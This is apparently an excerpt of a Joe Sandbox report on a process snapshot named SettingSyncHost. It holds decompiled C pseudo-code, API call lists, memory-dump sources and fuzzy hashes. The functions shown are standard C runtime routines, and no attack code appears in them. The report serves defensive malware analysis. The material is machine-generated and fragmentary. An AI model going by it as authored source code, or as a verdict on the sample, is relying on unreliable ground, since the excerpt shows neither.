                                                                                                                                      • Instruction Fuzzy Hash: AC613B719107959FDB12DF76C842BAEB7E9AF44310F254629E845EB2C1EB70AD018B50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                      			E003A315C() {
                                                                                                                                      				intOrPtr* _v8;
                                                                                                                                      				void** _v12;
                                                                                                                                      				struct _STARTUPINFOW _v80;
                                                                                                                                      				signed int _t61;
                                                                                                                                      				void* _t62;
                                                                                                                                      				long _t65;
                                                                                                                                      				signed int _t68;
                                                                                                                                      				signed int _t69;
                                                                                                                                      				signed int _t70;
                                                                                                                                      				int _t72;
                                                                                                                                      				signed int _t73;
                                                                                                                                      				intOrPtr* _t74;
                                                                                                                                      				void* _t77;
                                                                                                                                      				long _t85;
                                                                                                                                      				signed int _t86;
                                                                                                                                      				signed int _t87;
                                                                                                                                      				signed int _t88;
                                                                                                                                      				signed int _t91;
                                                                                                                                      				int _t93;
                                                                                                                                      				signed char _t98;
                                                                                                                                      				void* _t108;
                                                                                                                                      				signed int _t110;
                                                                                                                                      				signed int* _t111;
                                                                                                                                      				int _t112;
                                                                                                                                      				void** _t115;
                                                                                                                                      				void** _t120;
                                                                                                                                      				signed int _t121;
                                                                                                                                      
                                                                                                                                      				GetStartupInfoW( &_v80);
                                                                                                                                      				_push(0x40);
                                                                                                                                      				_t112 = 0x20;
                                                                                                                                      				_push(_t112);
                                                                                                                                      				_t61 = E0039A7FF();
                                                                                                                                      				if(_t61 != 0) {
                                                                                                                                      					_t2 = _t61 + 0x800; // 0x800
                                                                                                                                      					 *0x4ee8c0 = _t61;
                                                                                                                                      					 *0x4ee868 = _t112;
                                                                                                                                      					__eflags = _t61 - _t2;
                                                                                                                                      					if(_t61 >= _t2) {
                                                                                                                                      						L5:
                                                                                                                                      						__eflags = _v80.cbReserved2;
                                                                                                                                      						if(_v80.cbReserved2 == 0) {
                                                                                                                                      							L27:
                                                                                                                                      							_t91 = 0;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      							do {
                                                                                                                                      								_t115 = (_t91 << 6) +  *0x4ee8c0;
                                                                                                                                      								_t62 =  *_t115;
                                                                                                                                      								__eflags = _t62 - 0xffffffff;
                                                                                                                                      								if(_t62 == 0xffffffff) {
                                                                                                                                      									L31:
                                                                                                                                      									_t115[1] = 0x81;
                                                                                                                                      									__eflags = _t91;
                                                                                                                                      									if(_t91 != 0) {
                                                                                                                                      										_t50 = _t91 - 1; // -1
                                                                                                                                      										asm("sbb eax, eax");
                                                                                                                                      										_t65 =  ~_t50 + 0xfffffff5;
                                                                                                                                      										__eflags = _t65;
                                                                                                                                      									} else {
                                                                                                                                      										_t65 = 0xfffffff6;
                                                                                                                                      									}
                                                                                                                                      									_t108 = GetStdHandle(_t65);
                                                                                                                                      									__eflags = _t108 - 0xffffffff;
                                                                                                                                      									if(_t108 == 0xffffffff) {
                                                                                                                                      										L43:
                                                                                                                                      										_t58 =  &(_t115[1]);
                                                                                                                                      										 *_t58 = _t115[1] | 0x00000040;
                                                                                                                                      										__eflags =  *_t58;
                                                                                                                                      										 *_t115 = 0xfffffffe;
                                                                                                                                      										goto L44;
                                                                                                                                      									} else {
                                                                                                                                      										__eflags = _t108;
                                                                                                                                      										if(_t108 == 0) {
                                                                                                                                      											goto L43;
                                                                                                                                      										}
                                                                                                                                      										_t69 = GetFileType(_t108);
                                                                                                                                      										__eflags = _t69;
                                                                                                                                      										if(_t69 == 0) {
                                                                                                                                      											goto L43;
                                                                                                                                      										}
                                                                                                                                      										_t70 = _t69 & 0x000000ff;
                                                                                                                                      										 *_t115 = _t108;
                                                                                                                                      										__eflags = _t70 - 2;
                                                                                                                                      										if(_t70 != 2) {
                                                                                                                                      											__eflags = _t70 - 3;
                                                                                                                                      											if(_t70 == 3) {
                                                                                                                                      												_t53 =  &(_t115[1]);
                                                                                                                                      												 *_t53 = _t115[1] | 0x00000008;
                                                                                                                                      												__eflags =  *_t53;
                                                                                                                                      											}
                                                                                                                                      										} else {
                                                                                                                                      											_t115[1] = _t115[1] | 0x00000040;
                                                                                                                                      										}
                                                                                                                                      										_t55 =  &(_t115[3]); // -5171380
                                                                                                                                      										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
                                                                                                                                      										__eflags = _t72;
                                                                                                                                      										if(_t72 == 0) {
                                                                                                                                      											L48:
                                                                                                                                      											_t68 = _t72 | 0xffffffff;
                                                                                                                                      											L46:
                                                                                                                                      											return _t68;
                                                                                                                                      										} else {
                                                                                                                                      											_t115[2] = _t115[2] + 1;
                                                                                                                                      											goto L44;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								__eflags = _t62 - 0xfffffffe;
                                                                                                                                      								if(_t62 == 0xfffffffe) {
                                                                                                                                      									goto L31;
                                                                                                                                      								}
                                                                                                                                      								_t115[1] = _t115[1] | 0x00000080;
                                                                                                                                      								L44:
                                                                                                                                      								_t91 = _t91 + 1;
                                                                                                                                      								__eflags = _t91 - 3;
                                                                                                                                      							} while (_t91 < 3);
                                                                                                                                      							SetHandleCount( *0x4ee868);
                                                                                                                                      							_t68 = 0;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      							goto L46;
                                                                                                                                      						}
                                                                                                                                      						_t73 = _v80.lpReserved2;
                                                                                                                                      						__eflags = _t73;
                                                                                                                                      						if(_t73 == 0) {
                                                                                                                                      							goto L27;
                                                                                                                                      						}
                                                                                                                                      						_t93 =  *_t73;
                                                                                                                                      						_t74 = _t73 + 4;
                                                                                                                                      						_v8 = _t74;
                                                                                                                                      						_v12 = _t74 + _t93;
                                                                                                                                      						__eflags = _t93 - 0x800;
                                                                                                                                      						if(_t93 >= 0x800) {
                                                                                                                                      							_t93 = 0x800;
                                                                                                                                      						}
                                                                                                                                      						__eflags =  *0x4ee868 - _t93; // 0x0
                                                                                                                                      						if(__eflags >= 0) {
                                                                                                                                      							L18:
                                                                                                                                      							_t110 = 0;
                                                                                                                                      							__eflags = _t93;
                                                                                                                                      							if(_t93 <= 0) {
                                                                                                                                      								goto L27;
                                                                                                                                      							} else {
                                                                                                                                      								goto L19;
                                                                                                                                      							}
                                                                                                                                      							do {
                                                                                                                                      								L19:
                                                                                                                                      								_t77 =  *_v12;
                                                                                                                                      								__eflags = _t77 - 0xffffffff;
                                                                                                                                      								if(_t77 == 0xffffffff) {
                                                                                                                                      									goto L26;
                                                                                                                                      								}
                                                                                                                                      								__eflags = _t77 - 0xfffffffe;
                                                                                                                                      								if(_t77 == 0xfffffffe) {
                                                                                                                                      									goto L26;
                                                                                                                                      								}
                                                                                                                                      								_t98 =  *_v8;
                                                                                                                                      								__eflags = _t98 & 0x00000001;
                                                                                                                                      								if((_t98 & 0x00000001) == 0) {
                                                                                                                                      									goto L26;
                                                                                                                                      								}
                                                                                                                                      								__eflags = _t98 & 0x00000008;
                                                                                                                                      								if((_t98 & 0x00000008) != 0) {
                                                                                                                                      									L24:
                                                                                                                                      									_t120 = ((_t110 & 0x0000001f) << 6) + 0x4ee8c0[_t110 >> 5];
                                                                                                                                      									 *_t120 =  *_v12;
                                                                                                                                      									_t120[1] =  *_v8;
                                                                                                                                      									_t40 =  &(_t120[3]); // 0xc
                                                                                                                                      									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
                                                                                                                                      									__eflags = _t72;
                                                                                                                                      									if(_t72 == 0) {
                                                                                                                                      										goto L48;
                                                                                                                                      									}
                                                                                                                                      									_t41 =  &(_t120[2]);
                                                                                                                                      									 *_t41 = _t120[2] + 1;
                                                                                                                                      									__eflags =  *_t41;
                                                                                                                                      									goto L26;
                                                                                                                                      								}
                                                                                                                                      								_t85 = GetFileType(_t77);
                                                                                                                                      								__eflags = _t85;
                                                                                                                                      								if(_t85 == 0) {
                                                                                                                                      									goto L26;
                                                                                                                                      								}
                                                                                                                                      								goto L24;
                                                                                                                                      								L26:
                                                                                                                                      								_v12 =  &(_v12[1]);
                                                                                                                                      								_t110 = _t110 + 1;
                                                                                                                                      								_v8 = _v8 + 1;
                                                                                                                                      								__eflags = _t110 - _t93;
                                                                                                                                      							} while (_t110 < _t93);
                                                                                                                                      							goto L27;
                                                                                                                                      						} else {
                                                                                                                                      							_t111 = 0x4ee8c4;
                                                                                                                                      							while(1) {
                                                                                                                                      								_t86 = E0039A7FF(0x20, 0x40);
                                                                                                                                      								__eflags = _t86;
                                                                                                                                      								if(_t86 == 0) {
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								 *0x4ee868 =  *0x4ee868 + 0x20;
                                                                                                                                      								_t16 = _t86 + 0x800; // 0x800
                                                                                                                                      								 *_t111 = _t86;
                                                                                                                                      								__eflags = _t86 - _t16;
                                                                                                                                      								if(_t86 >= _t16) {
                                                                                                                                      									L15:
                                                                                                                                      									_t111 =  &(_t111[1]);
                                                                                                                                      									__eflags =  *0x4ee868 - _t93; // 0x0
                                                                                                                                      									if(__eflags < 0) {
                                                                                                                                      										continue;
                                                                                                                                      									}
                                                                                                                                      									goto L18;
                                                                                                                                      								}
                                                                                                                                      								_t87 = _t86 + 5;
                                                                                                                                      								__eflags = _t87;
                                                                                                                                      								do {
                                                                                                                                      									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
                                                                                                                                      									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
                                                                                                                                      									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
                                                                                                                                      									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
                                                                                                                                      									 *((short*)(_t87 - 1)) = 0xa00;
                                                                                                                                      									 *((short*)(_t87 + 0x20)) = 0xa0a;
                                                                                                                                      									 *((char*)(_t87 + 0x2f)) = 0;
                                                                                                                                      									_t87 = _t87 + 0x40;
                                                                                                                                      									_t28 = _t87 - 5; // -74
                                                                                                                                      									__eflags = _t28 -  *_t111 + 0x800;
                                                                                                                                      								} while (_t28 <  *_t111 + 0x800);
                                                                                                                                      								goto L15;
                                                                                                                                      							}
                                                                                                                                      							_t93 =  *0x4ee868; // 0x0
                                                                                                                                      							goto L18;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					_t88 = _t61 + 5;
                                                                                                                                      					__eflags = _t88;
                                                                                                                                      					do {
                                                                                                                                      						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
                                                                                                                                      						 *((short*)(_t88 - 1)) = 0xa00;
                                                                                                                                      						 *((intOrPtr*)(_t88 + 3)) = 0;
                                                                                                                                      						 *((short*)(_t88 + 0x1f)) = 0xa00;
                                                                                                                                      						 *((char*)(_t88 + 0x21)) = 0xa;
                                                                                                                                      						 *((intOrPtr*)(_t88 + 0x33)) = 0;
                                                                                                                                      						 *((char*)(_t88 + 0x2f)) = 0;
                                                                                                                                      						_t121 =  *0x4ee8c0; // 0x0
                                                                                                                                      						_t88 = _t88 + 0x40;
                                                                                                                                      						_t11 = _t88 - 5; // -74
                                                                                                                                      						__eflags = _t11 - _t121 + 0x800;
                                                                                                                                      					} while (_t11 < _t121 + 0x800);
                                                                                                                                      					goto L5;
                                                                                                                                      				}
                                                                                                                                      				return _t61 | 0xffffffff;
                                                                                                                                      			}































                                                                                                                                      APIs
                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 003A3169
                                                                                                                                      • __calloc_crt.LIBCMT ref: 003A3175
                                                                                                                                        • Part of subcall function 0039A7FF: Sleep.KERNEL32(00000000), ref: 0039A827
                                                                                                                                      • __calloc_crt.LIBCMT ref: 003A3215
                                                                                                                                      • GetFileType.KERNEL32(?), ref: 003A329C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __calloc_crt$FileInfoSleepStartupType
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 591920814-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3409252457-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 003DA957
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003DA983
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 003DA9C2
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003DA9DF
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 003DAA1E
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003DAA3B
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003DAA7D
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003DAAA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2040435927-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • _free.LIBCMT ref: 003E304E
                                                                                                                                      • _free.LIBCMT ref: 003E3067
                                                                                                                                      • _free.LIBCMT ref: 003E30A5
                                                                                                                                      • _free.LIBCMT ref: 003E30AE
                                                                                                                                      • _free.LIBCMT ref: 003E30BA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorLast
                                                                                                                                      • String ID: C
                                                                                                                                      • API String ID: 3291180501-1037565863
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003ECBC8: _free.LIBCMT ref: 003ECBED
                                                                                                                                      • _free.LIBCMT ref: 003ECECA
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      • _free.LIBCMT ref: 003ECED5
                                                                                                                                      • _free.LIBCMT ref: 003ECEE0
                                                                                                                                      • _free.LIBCMT ref: 003ECF34
                                                                                                                                      • _free.LIBCMT ref: 003ECF3F
                                                                                                                                      • _free.LIBCMT ref: 003ECF4A
                                                                                                                                      • _free.LIBCMT ref: 003ECF55
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E00393DCC(void* __ebx, void* __edi, void* __esi, void* __eflags, LONG** _a4) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				void* _t10;
                                                                                                                                      				LONG* _t13;
                                                                                                                                      				LONG* _t18;
                                                                                                                                      				LONG** _t33;
                                                                                                                                      
                                                                                                                                      				_t31 = __edi;
                                                                                                                                      				_t24 = __ebx;
                                                                                                                                      				_push(8);
                                                                                                                                      				_push(0x3c5d30);
                                                                                                                                      				_t10 = E0039A560(__ebx, __edi, __esi);
                                                                                                                                      				_t33 = _a4;
                                                                                                                                      				if(_t33 != 0) {
                                                                                                                                      					E00399DC7(__ebx, __edi, 0xd);
                                                                                                                                      					_v8 = _v8 & 0x00000000;
                                                                                                                                      					_t13 = _t33[1];
                                                                                                                                      					if(_t13 != 0 && InterlockedDecrement(_t13) == 0) {
                                                                                                                                      						_t22 = _t33[1];
                                                                                                                                      						if(_t33[1] != 0x3c7600) {
                                                                                                                                      							E00399DFA(_t22);
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					_v8 = 0xfffffffe;
                                                                                                                                      					E00393DB7();
                                                                                                                                      					if( *_t33 != 0) {
                                                                                                                                      						E00399DC7(_t24, _t31, 0xc);
                                                                                                                                      						_v8 = 1;
                                                                                                                                      						E00399323( *_t33);
                                                                                                                                      						_t18 =  *_t33;
                                                                                                                                      						if(_t18 != 0 &&  *_t18 == 0 && _t18 != 0x3c7210) {
                                                                                                                                      							E003993BC(_t18);
                                                                                                                                      						}
                                                                                                                                      						_v8 = 0xfffffffe;
                                                                                                                                      						E00393DC3();
                                                                                                                                      					}
                                                                                                                                      					 *_t33 = 0xbaadf00d;
                                                                                                                                      					_t33[1] = 0xbaadf00d;
                                                                                                                                      					_t10 = E00399DFA(_t33);
                                                                                                                                      				}
                                                                                                                                      				return E0039A5A5(_t10);
                                                                                                                                      			}









                                                                                                                                      APIs
                                                                                                                                      • __lock.LIBCMT ref: 00393D23
                                                                                                                                        • Part of subcall function 00399DC7: __mtinitlocknum.LIBCMT ref: 00399DDD
                                                                                                                                        • Part of subcall function 00399DC7: __amsg_exit.LIBCMT ref: 00399DE9
                                                                                                                                        • Part of subcall function 00399DC7: EnterCriticalSection.KERNEL32(00000001,00000001,?,003997EE,0000000D), ref: 00399DF1
                                                                                                                                      • InterlockedDecrement.KERNEL32(00000000), ref: 00393D35
                                                                                                                                      • _free.LIBCMT ref: 00393D4A
                                                                                                                                        • Part of subcall function 00399DFA: HeapFree.KERNEL32(00000000,00000000,?,003998C2,00000000), ref: 00399E10
                                                                                                                                        • Part of subcall function 00399DFA: GetLastError.KERNEL32(00000000,?,003998C2,00000000), ref: 00399E22
                                                                                                                                      • __lock.LIBCMT ref: 00393D63
                                                                                                                                      • ___removelocaleref.LIBCMT ref: 00393D72
                                                                                                                                      • ___freetlocinfo.LIBCMT ref: 00393D8B
                                                                                                                                      • _free.LIBCMT ref: 00393DA8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 556454624-0
                                                                                                                                      • Opcode ID: 462202dbb0012538e2aa7d22571102c3730b93f89507c09fdf16afc2c3b718d8
                                                                                                                                      • Instruction ID: 725667828f60b6017fae6f3ffcf4e6282461747d8db97d514235a78c06464022
                                                                                                                                      • Opcode Fuzzy Hash: 462202dbb0012538e2aa7d22571102c3730b93f89507c09fdf16afc2c3b718d8
                                                                                                                                      • Instruction Fuzzy Hash: C31182B16017009BEF33AF68985AB5E73A4AF01720F21451DF499DF1D1DB74DE80CA95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E003997A4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                      				intOrPtr _t26;
                                                                                                                                      				intOrPtr _t30;
                                                                                                                                      				intOrPtr _t39;
                                                                                                                                      				void* _t40;
                                                                                                                                      
                                                                                                                                      				_t31 = __ebx;
                                                                                                                                      				_push(8);
                                                                                                                                      				_push(0x3c5e78);
                                                                                                                                      				E0039A560(__ebx, __edi, __esi);
                                                                                                                                      				GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                                                      				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                                                                      				 *((intOrPtr*)(_t39 + 0x5c)) = 0x3c2fd8;
                                                                                                                                      				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                                                                                                                      				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                                                                                                                      				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                                                                                                                      				 *((char*)(_t39 + 0xc8)) = 0x43;
                                                                                                                                      				 *((char*)(_t39 + 0x14b)) = 0x43;
                                                                                                                                      				 *(_t39 + 0x68) = 0x3c7600;
                                                                                                                                      				E00399DC7(__ebx, 1, 0xd);
                                                                                                                                      				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                                                                                      				InterlockedIncrement( *(_t39 + 0x68));
                                                                                                                                      				 *(_t40 - 4) = 0xfffffffe;
                                                                                                                                      				E00399846();
                                                                                                                                      				E00399DC7(_t31, 1, 0xc);
                                                                                                                                      				 *(_t40 - 4) = 1;
                                                                                                                                      				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                                                                                                                      				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                      					_t30 =  *0x3c72e8; // 0x3c7210
                                                                                                                                      					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                                                                                                                      				}
                                                                                                                                      				E00399294( *((intOrPtr*)(_t39 + 0x6c)));
                                                                                                                                      				 *(_t40 - 4) = 0xfffffffe;
                                                                                                                                      				return E0039A5A5(E0039984F());
                                                                                                                                      			}








                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,003C5E78,00000008,003998AC,00000000,00000000), ref: 003997B5
                                                                                                                                      • __lock.LIBCMT ref: 003997E9
                                                                                                                                        • Part of subcall function 00399DC7: __mtinitlocknum.LIBCMT ref: 00399DDD
